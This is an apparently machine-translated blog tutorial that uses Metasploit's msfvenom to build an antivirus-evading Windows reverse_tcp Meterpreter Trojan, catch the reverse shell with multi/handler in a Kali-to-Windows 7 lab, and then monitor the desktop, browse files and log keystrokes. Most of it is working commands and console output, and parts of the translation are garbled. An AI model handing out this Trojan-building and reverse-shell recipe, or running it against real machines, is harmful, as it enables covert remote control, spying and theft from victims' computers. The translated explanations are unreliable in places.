Metasploitis an open source security vulnerability detection tool that helps security and IT professionals identify security issues, validate vulnerability mitigation measures, and manage expert-driven security assessments to provide true security risk intelligence
Features: This scalable model integrates load control, encoders, no-action generators, and vulnerabilities, making the Metasploit Framework a way to study high-risk vulnerabilities. It integrates common overflow vulnerabilities and popular shellcode on various platforms, and is constantly updated. The latest version of MSF contains more than 750 popular operating system and application software vulnerabilities, as well as 224 shellcode. As a security tool, it is used in the security detection of the role, and for the vulnerability of automatic detection and timely detection of system vulnerabilities provide a strong guarantee.
Metasploit comes with hundreds of vulnerabilities and can also see how to generate a vulnerability on the online exploit building demo (on-Line Vulnerability generation demo). This makes it easier to write a vulnerability, which is bound to raise the level of illegal shellcode and widen the dark side of the network. Similar professional vulnerability tools, such as core impact and canvas, have been used by many professional users. Metasploit lowered the threshold for use and promoted it to the public.
let's start with a simple and interesting little experiment.
Attack aircraft: kalilinux--2018.1 The latest version (just when the installation ran a lot of pits) ip:172.16.221.243
Victim: Windows7 ip:172.16.221.153
1. First generate a Trojan file
(1) msfvenom-p windows/meterpreter/reverse_tcp-e x86/shikata_ga_nai-i 5 lhost=172.16.221.243 lport=12315-f exe >/ro Ot/muma.exe
Msfvenom used to generate Trojan files
-p–payload < payload> Specify the payload to use (attack load)
Msfvenom-l payloads View all attack loads
Windows/meterpreter/reverse_tcp The attack load we choose to use
-e–encoder [Encoder] Specifies the encoder (encoder) to be used
Msfvenom-l encoders View Encoding
X86/shikata_ga_nai our chosen encoding format (for kill-free)
-I 5–iterations < count> specifies that the payload is encoded 5 times (the greater the probability of a kill-free)
Lhost Specify IP Address
LPORT Specifies that the listening port can be changed arbitrarily
-f–format < format> Specify output format (use –help-formats to get a list of the output formats supported by MSF)
/root/muma.exe specifying to the generated directory
2. Move the Trojan file to the victim host
3. I am directly using the graphical Armitage to facilitate the subsequent operation
(1) Use Exploit/multi/handler enter
(2) MSF exploit (Multi/handler) > Set payload WINDOWS/METERPRETER/REVERSE_TCP Select this attack payload
Payload = Windows/meterpreter/reverse_tcp This is the echo content proof has switched to this attack payload
(3) MSF exploit (Multi/handler) > Show Options View configuration of this attack payload
Module Options (Exploit/multi/handler): Name current Setting Required Description--------------------------- -----------Payload Options (windows/meterpreter/reverse_tcp): Name current Setting Required Description---- ----------------------------------exitfunc process Yes Exit technique (Accepted: ", SEH, Thread, Process, none) Lhost 172.16.221.243 yes the listen address Lport 18609 Yes the Listen Port Exploit target:id Name------0 Wildcard target (echo content) (4) MSF Exploit (Multi/handler) > Set Lport 12315 Modified to set the listening port when generating Trojan files Lport + 12315 (Echo content proof modified successfully) (5) MSF exploit (Multi/handler) > Show Options View the configuration of the attack payload Module options ( Exploit/multi/handler): Name current Setting Required Description--------------------------------------Paylo Ad Options (WINDOWS/METERPRETER/REVERSE_TCP): Name current Setting Required Description------------------- -------- ----------- Exitfunc process Yes Exit technique (Accepted: ", SEH, Thread, process, none) Lhost 172.16.221.243 Yes the Listen address Lport 12315 (see here the port has changed) Yes the Listen port Exploit target:id Nam E------0 Wildcard Target
(6) MSF exploit (Multi/handler) > Exploit run (Don't forget to run your Trojan file on the victim host)
[] Started reverse TCP handler on 172.16.221.243:12315
[] Sending stage (179779 bytes) to 172.16.221.153
[*] Meterpreter Session 9 opened (172.16.221.243:12315-172.16.221.153:50596) at 2018-04-27 15:17:12 +0800
[*] Meterpreter session 11 opened (172.16.221.243:12315 -> 172.16.221.153:50679) at 2018-04-27 15:37:31 +0800 出现以上内容即为成功
4. Just said that the graphical convenient operation, next to introduce some small operation
The computer appears so that it can attack.
The right mouse button will show the available load
Run some shell commands and suggest running the shell command with the Meterpreter shell. Other shell commands do not run when I do the experiment
Getuid Obtaining UID
SysInfo Viewing system
Run VNC to open VNC
Getdesktop Remote Monitoring Desktop
Browse Files Directory
Keyloggers all know
It's basically these little things.
Metasploit Spawn Trojan Bounce Shell